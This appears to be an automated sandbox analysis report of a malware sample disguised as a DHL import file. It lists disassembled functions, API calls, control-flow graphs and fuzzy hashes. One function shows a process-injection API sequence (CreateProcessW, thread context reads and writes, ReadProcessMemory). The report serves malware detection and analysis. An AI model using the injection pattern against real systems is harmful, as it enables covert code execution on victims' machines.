                                                                                          control_flow_graph 743 7d3b1c-7d3b27 744 7d3b99-7d3b9b 743->744 745 7d3b29-7d3b2e 743->745 746 7d3b8c-7d3b8f 744->746 745->744 747 7d3b30-7d3b48 RegOpenKeyExW 745->747 747->744 748 7d3b4a-7d3b69 RegQueryValueExW 747->748 749 7d3b6b-7d3b76 748->749 750 7d3b80-7d3b8b RegCloseKey 748->750 751 7d3b78-7d3b7a 749->751 752 7d3b90-7d3b97 749->752 750->746 753 7d3b7e 751->753 752->753 753->750
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B40
                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B61
                                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B83
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: Control Panel\Mouse
                                                                                          • API String ID: 3677997916-824357125
                                                                                          • Opcode ID: f519f6d519e2c63645c26eddd5b68002d1f0685959ac089df1a643a20dca4c5f
                                                                                          • Instruction ID: b10281e70d386c298b4bcb8fb2efe734a629ac003372f586d4372f91dbdd9881
                                                                                          • Opcode Fuzzy Hash: f519f6d519e2c63645c26eddd5b68002d1f0685959ac089df1a643a20dca4c5f
                                                                                          • Instruction Fuzzy Hash: E01127B5610208FFDB208FA5DC85AAEBBB8EF04744B10846BE845D7210E2759E409BA1
                                                                                          Function 03ABB140 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 754 3abb140-3abb1e0 call 3abd5b0 * 3 761 3abb1e2-3abb1ec 754->761 762 3abb1f7 754->762 761->762 763 3abb1ee-3abb1f5 761->763 764 3abb1fe-3abb207 762->764 763->764 765 3abb20e-3abb8c0 764->765 766 3abb8d3-3abb900 CreateProcessW 765->766 767 3abb8c2-3abb8c6 765->767 774 3abb90a 766->774 775 3abb902-3abb905 766->775 768 3abb8c8-3abb8cc 767->768 769 3abb90c-3abb939 767->769 770 3abb8ce 768->770 771 3abb945-3abb972 768->771 790 3abb93b-3abb93e 769->790 791 3abb943 769->791 773 3abb97c-3abb996 Wow64GetThreadContext 770->773 771->773 792 3abb974-3abb977 771->792 778 3abb998 773->778 779 3abb99d-3abb9b8 ReadProcessMemory 773->779 774->773 780 3abbd01-3abbd03 775->780 781 3abbcaa-3abbcae 778->781 782 3abb9ba 779->782 783 3abb9bf-3abb9c8 779->783 786 3abbcff 781->786 787 3abbcb0-3abbcb4 781->787 782->781 788 3abb9ca-3abb9d9 783->788 789 3abb9f1-3abba10 call 3abcc30 783->789 786->780 793 3abbcc9-3abbccd 787->793 794 3abbcb6-3abbcc2 787->794 788->789 795 3abb9db-3abb9ea call 3abcb80 788->795 801 3abba12 789->801 802 3abba17-3abba3a call 3abcd70 789->802 790->780 791->773 792->773 792->780 798 3abbcd9-3abbcdd 793->798 799 3abbccf-3abbcd2 793->799 794->793 795->789 810 3abb9ec 795->810 805 3abbce9-3abbced 798->805 806 3abbcdf-3abbce2 798->806 799->798 801->781 813 3abba3c-3abba43 802->813 814 3abba84-3abbaa5 call 3abcd70 802->814 807 3abbcfa-3abbcfd 805->807 808 3abbcef-3abbcf5 call 3abcb80 805->808 806->805 807->780 808->807 810->781 815 3abba7f 813->815 816 3abba45-3abba76 call 3abcd70 813->816 821 3abbaac-3abbaca call 3abd5d0 814->821 822 3abbaa7 814->822 815->781 824 3abba78 816->824 825 3abba7d 816->825 827 3abbad5-3abbadf 821->827 822->781 824->781 825->814 828 3abbae1-3abbb13 call 3abd5d0 827->828 829 3abbb15-3abbb19 827->829 828->827 831 3abbb1f-3abbb2f 829->831 832 3abbc04-3abbc21 call 3abc780 829->832 831->832 835 3abbb35-3abbb45 831->835 839 3abbc28-3abbc47 Wow64SetThreadContext 832->839 840 3abbc23 832->840 835->832 838 3abbb4b-3abbb6f 835->838 841 3abbb72-3abbb76 838->841 842 3abbc4b-3abbc56 call 3abcab0 839->842 843 3abbc49 839->843 840->781 841->832 844 3abbb7c-3abbb91 841->844 852 3abbc5a-3abbc5e 842->852 853 3abbc58 842->853 843->781 846 3abbba5-3abbba9 844->846 847 3abbbab-3abbbb7 846->847 848 3abbbe7-3abbbff 846->848 850 3abbbb9-3abbbe3 847->850 851 3abbbe5 847->851 848->841 850->851 851->846 855 3abbc6a-3abbc6e 852->855 856 3abbc60-3abbc63 852->856 853->781 857 3abbc7a-3abbc7e 855->857 858 3abbc70-3abbc73 855->858 856->855 859 3abbc8a-3abbc8e 857->859 860 3abbc80-3abbc83 857->860 858->857 861 3abbc9b-3abbca4 859->861 862 3abbc90-3abbc96 call 3abcb80 859->862 860->859 861->765 861->781 862->861
                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03ABB8FB
                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03ABB991
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03ABB9B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 2438371351-0
                                                                                          • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                          • Instruction ID: 76303b504acd1ac88df52765ec3525813b88de92aa59d0f2ffa77dbe8b772896
                                                                                          • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                          • Instruction Fuzzy Hash: 86620C30A14258DBEB24CFA4C854BDEB376EF58300F1091A9D10DEB395E7769E81CB69
                                                                                          Function 007DDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Variable must be of type 'Object'., xrefs: 008232B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Variable must be of type 'Object'.
                                                                                          • API String ID: 0-109567571
                                                                                          • Opcode ID: e674e74cae8c566a2a43f94f72c08295a01910daaa039d374d770028f5759c61
                                                                                          • Instruction ID: 3082fefeb8c839f34a9f3b50951fc566799088effd2c9c8cc79793451322c5fb
                                                                                          • Opcode Fuzzy Hash: e674e74cae8c566a2a43f94f72c08295a01910daaa039d374d770028f5759c61
                                                                                          • Instruction Fuzzy Hash: 15C29A70A00615CFCB25EF58D894AADB7B1FF09310F24816AE946AF391D379ED81CB91
                                                                                          Function 007EFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1374 7efddb-7efdde 1375 7efded-7efdf0 call 7fea0c 1374->1375 1377 7efdf5-7efdf8 1375->1377 1378 7efdfa-7efdfb 1377->1378 1379 7efde0-7efdeb call 7f4ead 1377->1379 1379->1375 1382 7efdfc-7efe00 1379->1382 1383 7f066e-7f0690 call 7f05cf call 7f32a4 1382->1383 1384 7efe06-7f066d call 7f059c call 7f32a4 1382->1384 1394 7f0697 1383->1394 1395 7f0692 1383->1395 1384->1383 1395->1394
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 007F0668
                                                                                            • Part of subcall function 007F32A4: RaiseException.KERNEL32(?,?,?,007F068A,?,008A1444,?,?,?,?,?,?,007F068A,007D1129,00898738,007D1129), ref: 007F3304
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 007F0685
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                          • String ID: Unknown exception
                                                                                          • API String ID: 3476068407-410509341
                                                                                          • Opcode ID: 83f87b78dea94c47fb287ebd768ac9f72a666cba74596f821f29143027734423
                                                                                          • Instruction ID: aa938632555f7bdcbc80cb8708df346a0401f2cd6a279eccde29245edece519a
                                                                                          • Opcode Fuzzy Hash: 83f87b78dea94c47fb287ebd768ac9f72a666cba74596f821f29143027734423
                                                                                          • Instruction Fuzzy Hash: CCF0A42490020DF7CF04B6A5DC5AD7E7B6CAE40350B604131BB24D6792EF79DA2585C0
                                                                                          Function 00857F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008582F5
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 008582FC
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 008584DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 146820519-0
                                                                                          • Opcode ID: 8ac20afd78a89dcde69be65fb1927350b612cbca3b61f7695a4efdab757b711b
                                                                                          • Instruction ID: 09cced3f4d7b68eb6bfad80c2ef202e0b593df2390f5974d27076a9d73405c18
                                                                                          • Opcode Fuzzy Hash: 8ac20afd78a89dcde69be65fb1927350b612cbca3b61f7695a4efdab757b711b
                                                                                          • Instruction Fuzzy Hash: 4C126C71A08341DFC714DF28C484A6ABBE1FF85319F04895EE889DB352DB35E949CB92
                                                                                          Function 007D10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D1BF4
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 007D1BFC
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D1C07
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D1C12
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 007D1C1A
                                                                                            • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 007D1C22
                                                                                            • Part of subcall function 007D1B4A: RegisterWindowMessageW.USER32(00000004,?,007D12C4), ref: 007D1BA2
                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007D136A
                                                                                          • OleInitialize.OLE32 ref: 007D1388
                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 008124AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1986988660-0
                                                                                          • Opcode ID: 3589562706f6a222b022029b67f62b46dcc47568165f7873eca44a4afdd41c6c
                                                                                          • Instruction ID: c47aa49d03b851c6db8bd69bfd923cc08e7c12e77024e115b762eaf46e744b15
                                                                                          • Opcode Fuzzy Hash: 3589562706f6a222b022029b67f62b46dcc47568165f7873eca44a4afdd41c6c
                                                                                          • Instruction Fuzzy Hash: 5A71CEB8D112108FEF84EFB9A84D6653AE1FB8B384F45823AD15AC7B61EB384444CF44
                                                                                          Function 0083C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D3A04
                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0083C259
                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 0083C261
                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0083C270
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                          • String ID:
                                                                                          • API String ID: 3500052701-0
                                                                                          • Opcode ID: e0e778f2ea7fd2268bf476255d76a94b34cb397c287cc74b3fb6f8da974321cc
                                                                                          • Instruction ID: b3d187a22b8a5885be2fc1db3e21c6ac0db52172cbc49f50e1f7b90101f45e4f
                                                                                          • Opcode Fuzzy Hash: e0e778f2ea7fd2268bf476255d76a94b34cb397c287cc74b3fb6f8da974321cc
                                                                                          • Instruction Fuzzy Hash: 1D319570904354AFEB229F648855BEBBBECFF46308F04049AD5DAA7241C7745A84CB91
                                                                                          Function 008086AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(00000000,00000000,?,?,008085CC,?,00898CC8,0000000C), ref: 00808704
                                                                                          • GetLastError.KERNEL32(?,008085CC,?,00898CC8,0000000C), ref: 0080870E
                                                                                          • __dosmaperr.LIBCMT ref: 00808739
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                          • String ID:
                                                                                          • API String ID: 2583163307-0
                                                                                          • Opcode ID: adeb01f5326bb7daaa644d69b933657b00626889729a586fbfd3419fbab8adf3
                                                                                          • Instruction ID: 5b15648b182fcab9cc7b1b24b37a7731572a079bcebe4916497df5d7b4f05ec0
                                                                                          • Opcode Fuzzy Hash: adeb01f5326bb7daaa644d69b933657b00626889729a586fbfd3419fbab8adf3
                                                                                          • Instruction Fuzzy Hash: 19016F336052209AD6E062385C5977F6B45FBA3774F370119F864DB2D2DEA28CC18651
                                                                                          Function 007DDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TranslateMessage.USER32(?), ref: 007DDB7B
                                                                                          • DispatchMessageW.USER32(?), ref: 007DDB89
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007DDB9F
                                                                                          • Sleep.KERNEL32(0000000A), ref: 007DDBB1
                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00821CC9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                          • String ID:
                                                                                          • API String ID: 3288985973-0
                                                                                          • Opcode ID: 1a4ebb62a6dc8b9ee9ae7581412b009c29a5d2105a690c661d076a9354b0a97c
                                                                                          • Instruction ID: 13b73ff500b00d270c1648a132dc2036efb39b4097c01288961f06d472c88f50
                                                                                          • Opcode Fuzzy Hash: 1a4ebb62a6dc8b9ee9ae7581412b009c29a5d2105a690c661d076a9354b0a97c
                                                                                          • Instruction Fuzzy Hash: 61F05E306443409BEB30CBA0DC4DFAA73B8FB45310F50492AE65AC31C0DB789888DB25
                                                                                          Function 007E1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 007E17F6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer
                                                                                          • String ID: CALL
                                                                                          • API String ID: 1385522511-4196123274
                                                                                          • Opcode ID: d0c5b4350facea53f332d76bac25c6cbb51a73eddea3b3d346ef0613467209d6
                                                                                          • Instruction ID: f154f1c66b48d74aad5f4d7bf08ccf73c9239d8e79d91056b1aff411005f3c4f
                                                                                          • Opcode Fuzzy Hash: d0c5b4350facea53f332d76bac25c6cbb51a73eddea3b3d346ef0613467209d6
                                                                                          • Instruction Fuzzy Hash: 06229B70609281DFC714DF15C485A2ABBF1FF89314F58896DF4968B3A2D739E891CB82
                                                                                          Function 007D2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00812C8C
                                                                                            • Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2
                                                                                            • Part of subcall function 007D2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D2DC4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                          • String ID: X
                                                                                          • API String ID: 779396738-3081909835
                                                                                          • Opcode ID: b1cd5ab15276890b5a8dfda1d6d797e95df6f791209827d46213e4e6e424b56c
                                                                                          • Instruction ID: bf8073afccc9f1e44fa6841ee9154b9cde6428b2ff7a51f61d78539f21fb3f51
                                                                                          • Opcode Fuzzy Hash: b1cd5ab15276890b5a8dfda1d6d797e95df6f791209827d46213e4e6e424b56c
                                                                                          • Instruction Fuzzy Hash: 02219671A002589BDF41EF94C8497EE7BFCEF49304F00405AE505E7341EBB859898FA1
                                                                                          Function 007D5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,007D949C,?,00008000), ref: 007D5773
                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,007D949C,?,00008000), ref: 00814052
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 5828c63c0f152a77680a32c7f3ebfea622f1cfa1d16cb5943319fd64bb855dc6
                                                                                          • Instruction ID: 349c370ece3b6c7e5c61c2f84cd56138e454965f8e5bb4fda645851412118f0d
                                                                                          • Opcode Fuzzy Hash: 5828c63c0f152a77680a32c7f3ebfea622f1cfa1d16cb5943319fd64bb855dc6
                                                                                          • Instruction Fuzzy Hash: 56015631145625B7E3704A26DC0EF977F58EF06770F258311FA9C5A1E0CBB45854CB90
                                                                                          Function 007DB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 007DBB4E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer
                                                                                          • String ID:
                                                                                          • API String ID: 1385522511-0
                                                                                          • Opcode ID: 7bef742201130fa230020bb73459d0ba608c627e5310455737dd9331cf273679
                                                                                          • Instruction ID: 8bc31c7b3db88cbf3c4740664c5255c4e8a52893befc1818444187ee1d905e99
                                                                                          • Opcode Fuzzy Hash: 7bef742201130fa230020bb73459d0ba608c627e5310455737dd9331cf273679
                                                                                          • Instruction Fuzzy Hash: 9B32BF74A00219DFDB20CF58C898ABEB7B5FF49314F15805AE915AB362C778ED81CB91
                                                                                          Function 03ABB13D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03ABB8FB
